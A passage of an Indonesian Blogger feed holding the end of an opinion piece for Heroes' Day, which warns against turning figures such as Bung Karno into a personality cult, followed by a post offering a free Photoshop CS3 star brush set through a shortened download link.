 perbuatan atau langkah yang tercela, seperti korupsi, berkeinginan 
memisahkan diri dari NKRI (separatisme) dan perbuatan-perbuatan tak 
terpuji lainnya, merupakan pengkhianatan terhadap cita-cita luhur para 
pahlawan yang telah mendahului kita.&lt;br /&gt;
&lt;br /&gt;
Namun kebalikannya, kita jangan sampai menghormati pahlawan dengan 
kelewat batas. Pengagungan yang berlebihan terhadap pahlawan atau tokoh 
akan menggiring kita pada apa yang disebut sebagai kultus individu. Ini 
berlainan dengan menghormati pahlawan (hero worship). &lt;br /&gt;
&lt;br /&gt;
Dalam sejarah Indonesia pada abad yang lalu, pernah terjadi suatu masa 
dimana sebagian rakyat Indonesia menghormati dan memuja Bung Karno 
secara berlebihan. Memang Bung Karno besar jasanya pada bangsa dan 
negara. Ia, bersama Bung Hatta adalah proklamator kemerdekaan, statusnya
 lebih tinggi dari Pahlawan Nasional. Ia juga berperanan besar sebagai 
peletak dasar negara, hingga kita tetap bersatu sebagai satu bangsa 
sekarang ini, karena memiliki jatidiri yang kuat yakni Pancasila. &lt;br /&gt;
&lt;br /&gt;
Namun penghormatan dan penghargaan yang berlebihan menyebabkan sebagian 
rakyat mengkultusindividukan Bung Karno. Karena sikap yang berlebihan 
tersebut, apapun yang disuarakan Bung Karno mereka anggap benar semua. 
Padahal bagaimanapun, dibalik segala kebesarannya Bung karno juga 
manusia biasa yang tak luput dari kesalahan atau kekhilafan. Di manapun,
 bila kita pelajari sejarah bangsa-bangsa lain, pemimpin yang merasa 
dikultusindividukan oleh rakyatnya akan mudah sekali menjadi otoriter, 
berkembang lebih jauh menjadi diktator, bila ia diberi kesempatan 
memegang tampuk kekuasaan negara. Ia merasa senang didewa-dewakan oleh 
rakyatnya. &lt;br /&gt;
&lt;br /&gt;
Orang menyebut adanya penyakit kejiwaan yang disebut megalomania. 
Megalomania adalah suatu kelainan jiwa (seorang pemimpin) yang ditandai 
oleh khayalan tentang kekuasaan dan kebesaran diri. Beruntung dalam abad
 ke-21 ini kita tidak lagi mempunyai pemimpin megalomaniak. Pada zaman 
dahulu pemujaan terhadap pemimpin atau palawan yang berlebihan menjurus 
pada pemujaan berlebihan terhadap pahlawan, sehingga pahlawan itu 
dianggap sebagai Dewa. Lalu dibuatlah patung-patung yang dipuja-puja 
sebagai Tuhan pada acara penting dalam ritual keagamaan tertentu. &lt;br /&gt;
&lt;br /&gt;
Dikisahkan, sebelum Nabi Muhammad SAW menaklukkan Mekah, di dalam Ka’bah
 terdapat patung-patung yang dipuja oleh orang-orang Arab bila mereka 
sedang beribadah mengelilingi Ka’bah. Patung-patung itu konon adalah 
perwujudan para pahlawan mereka yang dianggap besar jasanya dalam 
peperangan melawan musuh. Penghormatan yang berlebihan terhadap pahlawan
 yang diwujudkan dalam patung-patung itu kemudian dimusnahkan, karena 
menghambat manusia untuk berhubungan langsung dengan Allah, Tuhan Yang 
Maha Esa.&lt;br /&gt;
&lt;br /&gt;
Menghormati dan menghargai pahlawan tidak perlu berlebihan, cukup 
proporsional, kecuali kita meneruskan cita-cita luhur mereka, 
mengembangkan terus alam pikiran mereka untuk memperkuat motivasi 
meneruskan perjuangan pahlawan membangun tanah air! Selamat memperingati
 Hari Pahlawan! *** </content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/5509505619384998660/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/11/bung-karno-pernah-menyatakan-bahwa.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5509505619384998660'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5509505619384998660'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/11/bung-karno-pernah-menyatakan-bahwa.html' title='Menghormati Pahlawan'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-5142823051195055745</id><published>2012-08-26T00:56:00.002-07:00</published><updated>2012-09-05T00:12:12.259-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="photoshop"/><title type='text'>Download brush photoshop CS3 : Star Brush</title><content type='html'>&lt;h1 class=&quot;entry-title&quot;&gt;&lt;img alt=&quot;brush photoshop cs3&quot; class=&quot;aligncenter&quot; height=&quot;250&quot; src=&quot;https://lh6.googleusercontent.com/-x4JC0soTDME/Tejl088uUiI/AAAAAAAACNg/PTSjCEIiTd8/s800/Untitled-1.png&quot; title=&quot;download brush gratis&quot; width=&quot;500&quot; /&gt;&lt;/h1&gt;Kali ini, saya kembali akan mereview sebuah brush photoshop gratis  untuk anda yang telah lama saya gunakan untuk photoshop CS3 saya dan  terbukti bekerja pada adobe photoshop CS3.&lt;span id=&quot;more-554&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h3&gt;Preview brush photoshop&lt;/h3&gt;Berikut preview brush-brush yang bisa anda download gratis via &lt;i&gt;Ziddu&lt;/i&gt;&lt;br /&gt;
&lt;img alt=&quot;download brush gratis&quot; class=&quot;aligncenter&quot; height=&quot;287&quot; src=&quot;https://lh4.googleusercontent.com/-RYe2Eh1onJk/Tejl1VtSe1I/AAAAAAAACNk/F08BVW6m-JY/s800/Untitled-5.png&quot; title=&quot;gratis brush photoshop&quot; width=&quot;500&quot; /&gt;&lt;br /&gt;
&lt;img alt=&quot;brush gratis&quot; class=&quot;aligncenter&quot; height=&quot;287&quot; src=&quot;https://lh5.googleusercontent.com/-SlnamwPv3eg/Tejl15xF5TI/AAAAAAAACNo/_9NCsoM3uBc/s800/Untitled-2.png&quot; title=&quot;brush gratis&quot; width=&quot;500&quot; /&gt;&lt;br /&gt;
&lt;img alt=&quot;gratis brush photoshop&quot; class=&quot;aligncenter&quot; height=&quot;287&quot; src=&quot;https://lh3.googleusercontent.com/-jzwPXkyjQJw/Tejl2ssUrqI/AAAAAAAACNs/wsf86ms9LJs/s800/Untitled-3.png&quot; title=&quot;brush photoshop cs3&quot; width=&quot;500&quot; /&gt;&lt;br /&gt;
Brush yang berukuran sekitar 7,3 Mb ini terdiri dari 30 set brush  yang diantaranya seperti preview gambar-gambar diatas (Setelah saya  desain).&lt;br /&gt;
&lt;h3&gt;Download brush photoshop CS3 : Star Brush&lt;/h3&gt;Download brush photoshop gratis (Via Ziddu) di link tombol download dibawah ini&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/4cFgm&quot; target=&quot;_blank&quot; title=&quot;Star brush&quot;&gt;&lt;img alt=&quot;download brush photoshop cs3&quot; class=&quot;aligncenter size-full wp-image-446&quot; height=&quot;50&quot; src=&quot;http://psdesain.net/wp-content/uploads/2011/05/download-abr.png&quot; title=&quot;download brush&quot; width=&quot;230&quot; /&gt;&lt;/a&gt;</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/5142823051195055745/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/08/download-brush-photoshop-cs3-star-brush.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5142823051195055745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5142823051195055745'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/08/download-brush-photoshop-cs3-star-brush.html' title='Download brush photoshop CS3 : Star Brush'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://lh6.googleusercontent.com/-x4JC0soTDME/Tejl088uUiI/AAAAAAAACNg/PTSjCEIiTd8/s72-c/Untitled-1.png" height="72" width="72"/><thr:total>0</thr:total></entry></feed>